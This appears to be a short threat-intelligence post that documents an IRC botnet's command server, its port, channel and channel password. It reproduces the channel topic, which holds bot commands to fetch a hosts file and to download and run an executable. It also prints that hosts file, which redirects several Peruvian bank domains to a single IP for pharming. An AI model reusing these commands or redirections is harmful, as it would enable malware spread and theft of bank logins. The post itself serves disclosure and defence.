tuntu.info (ngr irc botnet hosted by United States Miami Servergrove)

Resolved tuntu.info to 69.195.198.208

Server:  tuntu.info
Port:  5487
Channel:  #zrl
Channel password:  filtro

* Topic for #zrl is: !mdns http://freebookclubs.com/thumb/demo/host.txt !up hxxp://www.cesarfelipe.com.br//wp-content/themes/sakura/upd.exe EC62971A5CE3FE7DB74BBA3E5D1568D6
* Topic for #zrl set by dexter at Sun Nov 11 17:11:54 2012

host.txt

www.bbvabancocontinental.com 38.109.219.132
bbvabancocontinental.com 38.109.219.132
www.bbvacontinental.com 38.109.219.132
bbvacontinental.com 38.109.219.132
www.bbvacontinental.pe 38.109.219.132
bbvacontinental.pe 38.109.219.132
148.244.45.125 38.109.219.132
www.bn.com.pe 38.109.219.132
bn.com.pe 38.109.219.132
200.48.202.43 38.109.219.132
200.48.202.44 38.109.219.132
zonasegura1.bn.com.pe 38.109.219.132
200.48.202.47 38.109.219.132
www.scotiabank.com.pe 38.109.219.132 
scotiabank.com.pe 38.109.219.132 
200.48.16.36 38.109.219.132 
200.4.206.20 38.109.219.132
www.interbank.com.pe 38.109.219.132 
interbank.com.pe 38.109.219.132
190.102.128.142 38.109.219.132

Thanks to bernaler on virustotal for the sample link.

Hosting infos: http://whois.domaintools.com/69.195.198.208

Categories: Uncategorized